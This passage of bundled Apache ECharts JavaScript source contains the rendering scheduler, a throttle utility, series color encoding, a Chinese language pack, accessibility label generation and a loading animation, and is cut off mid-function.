data.eachItemGraphicEl(function (el) {\n            elSetState(el, state, highlightDigit);\n        });\n    }\n}\n\n// Enable Chart.extend.\nenableClassExtend(Chart, ['dispose']);\n\n// Add capability of registerClass, getClass, hasClass, registerSubTypeDefaulter and so on.\nenableClassManagement(Chart, {registerWhenExtend: true});\n\nChart.markUpdateMethod = function (payload, methodName) {\n    inner$5(payload).updateMethod = methodName;\n};\n\nfunction renderTaskPlan(context) {\n    return renderPlanner(context.model);\n}\n\nfunction renderTaskReset(context) {\n    var seriesModel = context.model;\n    var ecModel = context.ecModel;\n    var api = context.api;\n    var payload = context.payload;\n    // ???! remove updateView updateVisual\n    var progressiveRender = seriesModel.pipelineContext.progressiveRender;\n    var view = context.view;\n\n    var updateMethod = payload && inner$5(payload).updateMethod;\n    var methodName = progressiveRender\n        ? 'incrementalPrepareRender'\n        : (updateMethod && view[updateMethod])\n        ? updateMethod\n        // `appendData` is also supported when data amount\n        // is less than progressive threshold.\n        : 'render';\n\n    if (methodName !== 'render') {\n        view[methodName](seriesModel, ecModel, api, payload);\n    }\n\n    return progressMethodMap[methodName];\n}\n\nvar progressMethodMap = {\n    incrementalPrepareRender: {\n        progress: function (params, context) {\n            context.view.incrementalRender(\n                params, context.model, context.ecModel, context.api, context.payload\n            );\n        }\n    },\n    render: {\n        // Put view.render in `progress` to support appendData. But in this case\n        // view.render should not be called in reset, otherwise it will be called\n        // twise. Use `forceFirstProgress` to make sure that view.render is called\n        // in any cases.\n        forceFirstProgress: true,\n        progress: function (params, context) {\n            context.view.render(\n                context.model, context.ecModel, context.api, context.payload\n            );\n        }\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar ORIGIN_METHOD = '\\0__throttleOriginMethod';\nvar RATE = '\\0__throttleRate';\nvar THROTTLE_TYPE = '\\0__throttleType';\n\n/**\n * @public\n * @param {(Function)} fn\n * @param {number} [delay=0] Unit: ms.\n * @param {boolean} [debounce=false]\n *        true: If call interval less than `delay`, only the last call works.\n *        false: If call interval less than `delay, call works on fixed rate.\n * @return {(Function)} throttled fn.\n */\nfunction throttle(fn, delay, debounce) {\n\n    var currCall;\n    var lastCall = 0;\n    var lastExec = 0;\n    var timer = null;\n    var diff;\n    var scope;\n    var args;\n    var debounceNextCall;\n\n    delay = delay || 0;\n\n    function exec() {\n        lastExec = (new Date()).getTime();\n        timer = null;\n        fn.apply(scope, args || []);\n    }\n\n    var cb = function () {\n        currCall = (new Date()).getTime();\n        scope = this;\n        args = arguments;\n        var thisDelay = debounceNextCall || delay;\n        var thisDebounce = debounceNextCall || debounce;\n        debounceNextCall = null;\n        diff = currCall - (thisDebounce ? lastCall : lastExec) - thisDelay;\n\n        clearTimeout(timer);\n\n        // Here we should make sure that: the `exec` SHOULD NOT be called later\n        // than a new call of `cb`, that is, preserving the command order. Consider\n        // calculating \"scale rate\" when roaming as an example. When a call of `cb`\n        // happens, either the `exec` is called dierectly, or the call is delayed.\n        // But the delayed call should never be later than next call of `cb`. Under\n        // this assurance, we can simply update view state each time `dispatchAction`\n        // triggered by user roaming, but not need to add extra code to avoid the\n        // state being \"rolled-back\".\n        if (thisDebounce) {\n            timer = setTimeout(exec, thisDelay);\n        }\n        else {\n            if (diff >= 0) {\n                exec();\n            }\n            else {\n                timer = setTimeout(exec, -diff);\n            }\n        }\n\n        lastCall = currCall;\n    };\n\n    /**\n     * Clear throttle.\n     * @public\n     */\n    cb.clear = function () {\n        if (timer) {\n            clearTimeout(timer);\n            timer = null;\n        }\n    };\n\n    /**\n     * Enable debounce once.\n     */\n    cb.debounceNextCall = function (debounceDelay) {\n        debounceNextCall = debounceDelay;\n    };\n\n    return cb;\n}\n\n/**\n * Create throttle method or update throttle rate.\n *\n * @example\n * ComponentView.prototype.render = function () {\n *     ...\n *     throttle.createOrUpdate(\n *         this,\n *         '_dispatchAction',\n *         this.model.get('throttle'),\n *         'fixRate'\n *     );\n * };\n * ComponentView.prototype.remove = function () {\n *     throttle.clear(this, '_dispatchAction');\n * };\n * ComponentView.prototype.dispose = function () {\n *     throttle.clear(this, '_dispatchAction');\n * };\n *\n * @public\n * @param {Object} obj\n * @param {string} fnAttr\n * @param {number} [rate]\n * @param {string} [throttleType='fixRate'] 'fixRate' or 'debounce'\n * @return {Function} throttled function.\n */\nfunction createOrUpdate(obj, fnAttr, rate, throttleType) {\n    var fn = obj[fnAttr];\n\n    if (!fn) {\n        return;\n    }\n\n    var originFn = fn[ORIGIN_METHOD] || fn;\n    var lastThrottleType = fn[THROTTLE_TYPE];\n    var lastRate = fn[RATE];\n\n    if (lastRate !== rate || lastThrottleType !== throttleType) {\n        if (rate == null || !throttleType) {\n            return (obj[fnAttr] = originFn);\n        }\n\n        fn = obj[fnAttr] = throttle(\n            originFn, rate, throttleType === 'debounce'\n        );\n        fn[ORIGIN_METHOD] = originFn;\n        fn[THROTTLE_TYPE] = throttleType;\n        fn[RATE] = rate;\n    }\n\n    return fn;\n}\n\n/**\n * Clear throttle. Example see throttle.createOrUpdate.\n *\n * @public\n * @param {Object} obj\n * @param {string} fnAttr\n */\nfunction clear(obj, fnAttr) {\n    var fn = obj[fnAttr];\n    if (fn && fn[ORIGIN_METHOD]) {\n        obj[fnAttr] = fn[ORIGIN_METHOD];\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar seriesColor = {\n    createOnAllSeries: true,\n    performRawSeries: true,\n    reset: function (seriesModel, ecModel) {\n        var data = seriesModel.getData();\n        var colorAccessPath = (seriesModel.visualColorAccessPath || 'itemStyle.color').split('.');\n        // Set in itemStyle\n        var color = seriesModel.get(colorAccessPath);\n        var colorCallback = (isFunction$1(color) && !(color instanceof Gradient))\n            ? color : null;\n        // Default color\n        if (!color || colorCallback) {\n            color = seriesModel.getColorFromPalette(\n                // TODO series count changed.\n                seriesModel.name, null, ecModel.getSeriesCount()\n            );\n        }\n\n        data.setVisual('color', color);\n\n        var borderColorAccessPath = (seriesModel.visualBorderColorAccessPath || 'itemStyle.borderColor').split('.');\n        var borderColor = seriesModel.get(borderColorAccessPath);\n        data.setVisual('borderColor', borderColor);\n\n        // Only visible series has each data be visual encoded\n        if (!ecModel.isSeriesFiltered(seriesModel)) {\n            if (colorCallback) {\n                data.each(function (idx) {\n                    data.setItemVisual(\n                        idx, 'color', colorCallback(seriesModel.getDataParams(idx))\n                    );\n                });\n            }\n\n            // itemStyle in each data item\n            var dataEach = function (data, idx) {\n                var itemModel = data.getItemModel(idx);\n                var color = itemModel.get(colorAccessPath, true);\n                var borderColor = itemModel.get(borderColorAccessPath, true);\n                if (color != null) {\n                    data.setItemVisual(idx, 'color', color);\n                }\n                if (borderColor != null) {\n                    data.setItemVisual(idx, 'borderColor', borderColor);\n                }\n            };\n\n            return { dataEach: data.hasItemOption ? dataEach : null };\n        }\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Language: (Simplified) Chinese.\n */\n\nvar lang = {\n    legend: {\n        selector: {\n            all: '全选',\n            inverse: '反选'\n        }\n    },\n    toolbox: {\n        brush: {\n            title: {\n                rect: '矩形选择',\n                polygon: '圈选',\n                lineX: '横向选择',\n                lineY: '纵向选择',\n                keep: '保持选择',\n                clear: '清除选择'\n            }\n        },\n        dataView: {\n            title: '数据视图',\n            lang: ['数据视图', '关闭', '刷新']\n        },\n        dataZoom: {\n            title: {\n                zoom: '区域缩放',\n                back: '区域缩放还原'\n            }\n        },\n        magicType: {\n            title: {\n                line: '切换为折线图',\n                bar: '切换为柱状图',\n                stack: '切换为堆叠',\n                tiled: '切换为平铺'\n            }\n        },\n        restore: {\n            title: '还原'\n        },\n        saveAsImage: {\n            title: '保存为图片',\n            lang: ['右键另存为图片']\n        }\n    },\n    series: {\n        typeNames: {\n            pie: '饼图',\n            bar: '柱状图',\n            line: '折线图',\n            scatter: '散点图',\n            effectScatter: '涟漪散点图',\n            radar: '雷达图',\n            tree: '树图',\n            treemap: '矩形树图',\n            boxplot: '箱型图',\n            candlestick: 'K线图',\n            k: 'K线图',\n            heatmap: '热力图',\n            map: '地图',\n            parallel: '平行坐标图',\n            lines: '线图',\n            graph: '关系图',\n            sankey: '桑基图',\n            funnel: '漏斗图',\n            gauge: '仪表盘图',\n            pictorialBar: '象形柱图',\n            themeRiver: '主题河流图',\n            sunburst: '旭日图'\n        }\n    },\n    aria: {\n        general: {\n            withTitle: '这是一个关于“{title}”的图表。',\n            withoutTitle: '这是一个图表，'\n        },\n        series: {\n            single: {\n                prefix: '',\n                withName: '图表类型是{seriesType}，表示{seriesName}。',\n                withoutName: '图表类型是{seriesType}。'\n            },\n            multiple: {\n                prefix: '它由{seriesCount}个图表系列组成。',\n                withName: '第{seriesId}个系列是一个表示{seriesName}的{seriesType}，',\n                withoutName: '第{seriesId}个系列是一个{seriesType}，',\n                separator: {\n                    middle: '；',\n                    end: '。'\n                }\n            }\n        },\n        data: {\n            allData: '其数据是——',\n            partialData: '其中，前{displayCnt}项是——',\n            withName: '{name}的数据是{value}',\n            withoutName: '{value}',\n            separator: {\n                middle: '，',\n                end: ''\n            }\n        }\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar aria = function (dom, ecModel) {\n    var ariaModel = ecModel.getModel('aria');\n    if (!ariaModel.get('show')) {\n        return;\n    }\n    else if (ariaModel.get('description')) {\n        dom.setAttribute('aria-label', ariaModel.get('description'));\n        return;\n    }\n\n    var seriesCnt = 0;\n    ecModel.eachSeries(function (seriesModel, idx) {\n        ++seriesCnt;\n    }, this);\n\n    var maxDataCnt = ariaModel.get('data.maxCount') || 10;\n    var maxSeriesCnt = ariaModel.get('series.maxCount') || 10;\n    var displaySeriesCnt = Math.min(seriesCnt, maxSeriesCnt);\n\n    var ariaLabel;\n    if (seriesCnt < 1) {\n        // No series, no aria label\n        return;\n    }\n    else {\n        var title = getTitle();\n        if (title) {\n            ariaLabel = replace(getConfig('general.withTitle'), {\n                title: title\n            });\n        }\n        else {\n            ariaLabel = getConfig('general.withoutTitle');\n        }\n\n        var seriesLabels = [];\n        var prefix = seriesCnt > 1\n            ? 'series.multiple.prefix'\n            : 'series.single.prefix';\n        ariaLabel += replace(getConfig(prefix), { seriesCount: seriesCnt });\n\n        ecModel.eachSeries(function (seriesModel, idx) {\n            if (idx < displaySeriesCnt) {\n                var seriesLabel;\n\n                var seriesName = seriesModel.get('name');\n                var seriesTpl = 'series.'\n                    + (seriesCnt > 1 ? 'multiple' : 'single') + '.';\n                seriesLabel = getConfig(seriesName\n                    ? seriesTpl + 'withName'\n                    : seriesTpl + 'withoutName');\n\n                seriesLabel = replace(seriesLabel, {\n                    seriesId: seriesModel.seriesIndex,\n                    seriesName: seriesModel.get('name'),\n                    seriesType: getSeriesTypeName(seriesModel.subType)\n                });\n\n                var data = seriesModel.getData();\n                window.data = data;\n                if (data.count() > maxDataCnt) {\n                    // Show part of data\n                    seriesLabel += replace(getConfig('data.partialData'), {\n                        displayCnt: maxDataCnt\n                    });\n                }\n                else {\n                    seriesLabel += getConfig('data.allData');\n                }\n\n                var dataLabels = [];\n                for (var i = 0; i < data.count(); i++) {\n                    if (i < maxDataCnt) {\n                        var name = data.getName(i);\n                        var value = retrieveRawValue(data, i);\n                        dataLabels.push(\n                            replace(\n                                name\n                                    ? getConfig('data.withName')\n                                    : getConfig('data.withoutName'),\n                                {\n                                    name: name,\n                                    value: value\n                                }\n                            )\n                        );\n                    }\n                }\n                seriesLabel += dataLabels\n                    .join(getConfig('data.separator.middle'))\n                    + getConfig('data.separator.end');\n\n                seriesLabels.push(seriesLabel);\n            }\n        });\n\n        ariaLabel += seriesLabels\n            .join(getConfig('series.multiple.separator.middle'))\n            + getConfig('series.multiple.separator.end');\n\n        dom.setAttribute('aria-label', ariaLabel);\n    }\n\n    function replace(str, keyValues) {\n        if (typeof str !== 'string') {\n            return str;\n        }\n\n        var result = str;\n        each$1(keyValues, function (value, key) {\n            result = result.replace(\n                new RegExp('\\\\{\\\\s*' + key + '\\\\s*\\\\}', 'g'),\n                value\n            );\n        });\n        return result;\n    }\n\n    function getConfig(path) {\n        var userConfig = ariaModel.get(path);\n        if (userConfig == null) {\n            var pathArr = path.split('.');\n            var result = lang.aria;\n            for (var i = 0; i < pathArr.length; ++i) {\n                result = result[pathArr[i]];\n            }\n            return result;\n        }\n        else {\n            return userConfig;\n        }\n    }\n\n    function getTitle() {\n        var title = ecModel.getModel('title').option;\n        if (title && title.length) {\n            title = title[0];\n        }\n        return title && title.text;\n    }\n\n    function getSeriesTypeName(type) {\n        return lang.series.typeNames[type] || '自定义图';\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar PI$1 = Math.PI;\n\n/**\n * @param {module:echarts/ExtensionAPI} api\n * @param {Object} [opts]\n * @param {string} [opts.text]\n * @param {string} [opts.color]\n * @param {string} [opts.textColor]\n * @return {module:zrender/Element}\n */\nvar loadingDefault = function (api, opts) {\n    opts = opts || {};\n    defaults(opts, {\n        text: 'loading',\n        color: '#c23531',\n        textColor: '#000',\n        maskColor: 'rgba(255, 255, 255, 0.8)',\n        zlevel: 0\n    });\n    var mask = new Rect({\n        style: {\n            fill: opts.maskColor\n        },\n        zlevel: opts.zlevel,\n        z: 10000\n    });\n    var arc = new Arc({\n        shape: {\n            startAngle: -PI$1 / 2,\n            endAngle: -PI$1 / 2 + 0.1,\n            r: 10\n        },\n        style: {\n            stroke: opts.color,\n            lineCap: 'round',\n            lineWidth: 5\n        },\n        zlevel: opts.zlevel,\n        z: 10001\n    });\n    var labelRect = new Rect({\n        style: {\n            fill: 'none',\n            text: opts.text,\n            textPosition: 'right',\n            textDistance: 10,\n            textFill: opts.textColor\n        },\n        zlevel: opts.zlevel,\n        z: 10001\n    });\n\n    arc.animateShape(true)\n        .when(1000, {\n            endAngle: PI$1 * 3 / 2\n        })\n        .start('circularInOut');\n    arc.animateShape(true)\n        .when(1000, {\n            startAngle: PI$1 * 3 / 2\n        })\n        .delay(300)\n        .start('circularInOut');\n\n    var group = new Group();\n    group.add(arc);\n    group.add(labelRect);\n    group.add(mask);\n    // Inject resize\n    group.resize = function () {\n        var cx = api.getWidth() / 2;\n        var cy = api.getHeight() / 2;\n        arc.setShape({\n            cx: cx,\n            cy: cy\n        });\n        var r = arc.shape.r;\n        labelRect.setShape({\n            x: cx - r,\n            y: cy - r,\n            width: r * 2,\n            height: r * 2\n        });\n\n        mask.setShape({\n            x: 0,\n            y: 0,\n            width: api.getWidth(),\n            height: api.getHeight()\n        });\n    };\n    group.resize();\n    return group;\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @module echarts/stream/Scheduler\n */\n\n/**\n * @constructor\n */\nfunction Scheduler(ecInstance, api, dataProcessorHandlers, visualHandlers) {\n    this.ecInstance = ecInstance;\n    this.api = api;\n    this.unfinished;\n\n    // Fix current processors in case that in some rear cases that\n    // processors might be registered after echarts instance created.\n    // Register processors incrementally for a echarts instance is\n    // not supported by this stream architecture.\n    var dataProcessorHandlers = this._dataProcessorHandlers = dataProcessorHandlers.slice();\n    var visualHandlers = this._visualHandlers = visualHandlers.slice();\n    this._allHandlers = dataProcessorHandlers.concat(visualHandlers);\n\n    /**\n     * @private\n     * @type {\n     *     [handlerUID: string]: {\n     *         seriesTaskMap?: {\n     *             [seriesUID: string]: Task\n     *         },\n     *         overallTask?: Task\n     *     }\n     * }\n     */\n    this._stageTaskMap = createHashMap();\n}\n\nvar proto = Scheduler.prototype;\n\n/**\n * @param {module:echarts/model/Global} ecModel\n * @param {Object} payload\n */\nproto.restoreData = function (ecModel, payload) {\n    // TODO: Only restroe needed series and components, but not all components.\n    // Currently `restoreData` of all of the series and component will be called.\n    // But some independent components like `title`, `legend`, `graphic`, `toolbox`,\n    // `tooltip`, `axisPointer`, etc, do not need series refresh when `setOption`,\n    // and some components like coordinate system, axes, dataZoom, visualMap only\n    // need their target series refresh.\n    // (1) If we are implementing this feature some day, we should consider these cases:\n    // if a data processor depends on a component (e.g., dataZoomProcessor depends\n    // on the settings of `dataZoom`), it should be re-performed if the component\n    // is modified by `setOption`.\n    // (2) If a processor depends on sevral series, speicified by its `getTargetSeries`,\n    // it should be re-performed when the result array of `getTargetSeries` changed.\n    // We use `dependencies` to cover these issues.\n    // (3) How to update target series when coordinate system related components modified.\n\n    // TODO: simply the dirty mechanism? Check whether only the case here can set tasks dirty,\n    // and this case all of the tasks will be set as dirty.\n\n    ecModel.restoreData(payload);\n\n    // Theoretically an overall task not only depends on each of its target series, but also\n    // depends on all of the series.\n    // The overall task is not in pipeline, and `ecModel.restoreData` only set pipeline tasks\n    // dirty. If `getTargetSeries` of an overall task returns nothing, we should also ensure\n    // that the overall task is set as dirty and to be performed, otherwise it probably cause\n    // state chaos. So we have to set dirty of all of the overall tasks manually, otherwise it\n    // probably cause state chaos (consider `dataZoomProcessor`).\n    this._stageTaskMap.each(function (taskRecord) {\n        var overallTask = taskRecord.overallTask;\n        overallTask && overallTask.dirty();\n    });\n};\n\n// If seriesModel provided, incremental threshold is check by series data.\nproto.getPerformArgs = function (task, isBlock) {\n    // For overall task\n    if (!task.__pipeline) {\n        return;\n    }\n\n    var pipeline = this._pipelineMap.get(task.__pipeline.id);\n    var pCtx = pipeline.context;\n    var incremental = !isBlock\n        && pipeline.progressiveEnabled\n        && (!pCtx || pCtx.progressiveRender)\n        && task.__idxInPipeline > pipeline.blockIndex;\n\n    var step = incremental ? pipeline.step : null;\n    var modDataCount = pCtx && pCtx.modDataCount;\n    var modBy = modDataCount != null ? Math.ceil(modDataCount / step) : null;\n\n    return {step: step, modBy: modBy, modDataCount: modDataCount};\n};\n\nproto.getPipeline = function (pipelineId) {\n    return this._pipelineMap.get(pipelineId);\n};\n\n/**\n * Current, progressive rendering starts from visual and layout.\n * Always detect render mode in the same stage, avoiding that incorrect\n * detection caused by data filtering.\n * Caution:\n * `updateStreamModes` use `seriesModel.getData()`.\n */\nproto.updateStreamModes = function (seriesModel, view) {\n    var pipeline = this._pipelineMap.get(seriesModel.uid);\n    var data = seriesModel.getData();\n    var dataLen = data.count();\n\n    // `progressiveRender` means that can render progressively in each\n    // animation frame. Note that some types of series do not provide\n    // `view.incrementalPrepareRender` but support `chart.appendData`. We\n    // use the term `incremental` but not `progressive` to describe the\n    // case that `chart.appendData`.\n    var progressiveRender = pipeline.progressiveEnabled\n        && view.incrementalPrepareRender\n        && dataLen >= pipeline.threshold;\n\n    var large = seriesModel.get('large') && dataLen >= seriesModel.get('largeThreshold');\n\n    // TODO: modDataCount should not updated if `appendData`, otherwise cause whole repaint.\n    // see `test/candlestick-large3.html`\n    var modDataCount = seriesModel.get('progressiveChunkMode') === 'mod' ? dataLen : null;\n\n    seriesModel.pipelineContext = pipeline.context = {\n        progressiveRender: progressiveRender,\n        modDataCount: modDataCount,\n        large: large\n    };\n};\n\nproto.restorePipelines = function (ecModel) {\n    var scheduler = this;\n    var pipelineMap = scheduler._pipelineMap = createHashMap();\n\n    ecModel.eachSeries(function (seriesModel) {\n        var progressive = seriesModel.getProgressive();\n        var pipelineId = seriesModel.uid;\n\n        pipelineMap.set(pipelineId, {\n            id: pipelineId,\n            head: null,\n            tail: null,\n            threshold: seriesModel.getProgressiveThreshold(),\n            progressiveEnabled: progressive\n                && !(seriesModel.preventIncremental && seriesModel.preventIncremental()),\n            blockIndex: -1,\n            step: Math.round(progressive || 700),\n            count: 0\n        });\n\n        pipe(scheduler, seriesModel, seriesModel.dataTask);\n    });\n};\n\nproto.prepareStageTasks = function () {\n    var stageTaskMap = this._stageTaskMap;\n    var ecModel = this.ecInstance.getModel();\n    var api = this.api;\n\n    each$1(this._allHandlers, function (handler) {\n        var record = stageTaskMap.get(handler.uid) || stageTaskMap.set(handler.uid, []);\n\n        handler.reset && createSeriesStageTask(this, handler, record, ecModel, api);\n        handler.overallReset && createOverallStageTask(this, handler, record, ecModel, api);\n    }, this);\n};\n\nproto.prepareView = function (view, model, ecModel, api) {\n    var renderTask = view.renderTask;\n    var context = renderTask.context;\n\n    context.model = model;\n    context.ecModel = ecModel;\n    context.api = api;\n\n    renderTask.__block = !view.incrementalPrepareRender;\n\n    pipe(this, model, renderTask);\n};\n\n\nproto.performDataProcessorTasks = function (ecModel, payload) {\n    // If we do not use `block` here, it should be considered when to update modes.\n    performStageTasks(this, this._dataProcessorHandlers, ecModel, payload, {block: true});\n};\n\n// opt\n// opt.visualType: 'visual' or 'layout'\n// opt.setDirty\nproto.performVisualTasks = function (ecModel, payload, opt) {\n    performStageTasks(this, this._visualHandlers, ecModel, payload, opt);\n};\n\nfunction performStageTasks(scheduler, stageHandlers, ecModel, payload, opt) {\n    opt = opt || {};\n    var unfinished;\n\n    each$1(stageHandlers, function (stageHandler, idx) {\n        if (opt.visualType && opt.visualType !== stageHandler.visualType) {\n            return;\n        }\n\n        var stageHandlerRecord = scheduler._stageTaskMap.get(stageHandler.uid);\n        var seriesTaskMap = stageHandlerRecord.seriesTaskMap;\n        var overallTask = stageHandlerRecord.overallTask;\n\n        if (overallTask) {\n            var overallNeedDirty;\n            var agentStubMap = overallTask.agentStubMap;\n            agentStubMap.each(function (stub) {\n                if (needSetDirty(opt, stub)) {\n                    stub.dirty();\n                    overallNeedDirty = true;\n                }\n            });\n            overallNeedDirty && overallTask.dirty();\n            updatePayload(overallTask, payload);\n            var performArgs = scheduler.getPerformArgs(overallTask, opt.block);\n            // Execute stubs firstly, which may set the overall task dirty,\n            // then execute the overall task. And stub will call seriesModel.setData,\n            // which ensures that in the overallTask seriesModel.getData() will not\n            // return incorrect data.\n            agentStubMap.each(function (stub) {\n                stub.perform(performArgs);\n            });\n            unfinished |= overallTask.perform(performArgs);\n        }\n        else if (seriesTaskMap) {\n            seriesTaskMap.each(function (task, pipelineId) {\n                if (needSetDirty(opt, task)) {\n                    task.dirty();\n                }\n                var performArgs = scheduler.getPerformArgs(task, opt.block);\n                // FIXME\n                // if intending to decalare `performRawSeries` in handlers, only\n                // stream-independent (specifically, data item independent) operations can be\n                // performed. Because is a series is filtered, most of the tasks will not\n                // be performed. A stream-dependent operation probably cause wrong biz logic.\n                // Perhaps we should not provide a separate callback for this case instead\n                // of providing the config `performRawSeries`. The stream-dependent operaions\n                // and stream-independent operations should better not be mixed.\n                performArgs.skip = !stageHandler.performRawSeries\n                    && ecModel.isSeriesFiltered(task.context.model);\n                updatePayload(task, payload);\n                unfinished |= task.perform(performArgs);\n            });\n        }\n    });\n\n    function needSetDirty(opt, task) {\n        return opt.setDirty && (!opt.dirtyMap || opt.dirtyMap.get(task.__pipeline.id));\n    }\n\n    scheduler.unfinished |= unfinished;\n}\n\nproto.performSeriesTasks = function (ecModel) {\n    var unfinished;\n\n    ecModel.eachSeries(function (seriesModel) {\n        // Progress to the end for dataInit and dataRestore.\n        unfinished |= seriesModel.dataTask.perform();\n    });\n\n    this.unfinished |= unfinished;\n};\n\nproto.plan = function () {\n    // Travel pipelines, check block.\n    this._pipelineMap.each(function (pipeline) {\n        var task = pipeline.tail;\n        do {\n            if (task.__block) {\n                pipeline.blockIndex = task.__idxInPipeline;\n                break;\n            }\n            task = task.getUpstream();\n        }\n        while (task);\n    });\n};\n\nvar updatePayload = proto.updatePayload = function (task, payload) {\n    payload !== 'remain' && (task.context.payload = payload);\n};\n\nfunction createSeriesStageTask(scheduler, stageHandler, stageHandlerRecord, ecModel, api) {\n    var seriesTaskMap = stageHandlerRecord.seriesTaskMap\n        || (stageHandlerRecord.seriesTaskMap = createHashMap());\n    var seriesType = stageHandler.seriesType;\n    var getTargetSeries = stageHandler.getTargetSeries;\n\n    // If a stageHandler should cover all series, `createOnAllSeries` should be declared mandatorily,\n    // to avoid some typo or abuse. Otherwise if an extension do not specify a `seriesType`,\n    // it works but it may cause other irrelevant charts blocked.\n    if (stageHandler.createOnAllSeries) {\n        ecModel.eachRawSeries(create);\n    }\n    else if (seriesType) {\n        ecModel.eachRawSeriesByType(seriesType, create);\n    }\n    else if (getTargetSeries) {\n        getTargetSeries(ecModel, api).each(create);\n    }\n\n    function create(seriesModel) {\n        var pipelineId = seriesModel.uid;\n\n        // Init tasks for each seriesModel only once.\n        // Reuse original task instance.\n        var task = seriesTaskMap.get(pipelineId)\n            || seriesTaskMap.set(pipelineId, createTask({\n                plan: seriesTaskPlan,\n                reset: seriesTaskReset,\n                count: seriesTaskCount\n            }));\n        task.context = {\n            model: seriesModel,\n            ecModel: ecModel,\n            api: api,\n            useClearVisual: stageHandler.isVisual && !stageHandler.isLayout,\n            plan: stageHandler.plan,\n            reset: stageHandler.reset,\n            scheduler: scheduler\n        };\n        pipe(scheduler, seriesModel, task);\n    }\n\n    // Clear unused series tasks.\n    var pipelineMap = scheduler._pipelineMap;\n    seriesTaskMap.each(function (task, pipelineId) {\n        if (!pipelineMap.get(pipelineId)) {\n            task.dispose();\n            seriesTaskMap.removeKey(pipelineId);\n        }\n    });\n}\n\nfunction createOverallStageTask(scheduler, stageHandler, stageHandlerRecord, ecModel, api) {\n    var overallTask = stageHandlerRecord.overallTask = stageHandlerRecord.overallTask\n        // For overall task, the function only be called on reset stage.\n        || createTask({reset: overallTaskReset});\n\n    overallTask.context = {\n        ecModel: ecModel,\n        api: api,\n        overallReset: stageHandler.overallReset,\n        scheduler: scheduler\n    };\n\n    // Reuse orignal stubs.\n    var agentStubMap = overallTask.agentStubMap = overallTask.agentStubMap || createHashMap();\n\n    var seriesType = stageHandler.seriesType;\n    var getTargetSeries = stageHandler.getTargetSeries;\n    var overallProgress = true;\n    var modifyOutputEnd = stageHandler.modifyOutputEnd;\n\n    // An overall task with seriesType detected or has `getTargetSeries`, we add\n    // stub in each pipelines, it will set the overall task dirty when the pipeline\n    // progress. Moreover, to avoid call the overall task each frame (too frequent),\n    // we set the pipeline block.\n    if (seriesType) {\n        ecModel.eachRawSeriesByType(seriesType, createStub);\n    }\n    else if (getTargetSeries) {\n        getTargetSeries(ecModel, api).each(createStub);\n    }\n    // Otherwise, (usually it is legancy case), the overall task will only be\n    // executed when upstream dirty. Otherwise the progressive rendering of all\n    // pipelines will be disabled unexpectedly. But it still needs stubs to receive\n    // dirty info from upsteam.\n    else {\n        overallProgress = false;\n        each$1(ecModel.getSeries(), createStub);\n    }\n\n    function createStub(seriesModel) {\n        var pipelineId = seriesModel.uid;\n        var stub = agentStubMap.get(pipelineId);\n        if (!stub) {\n            stub = 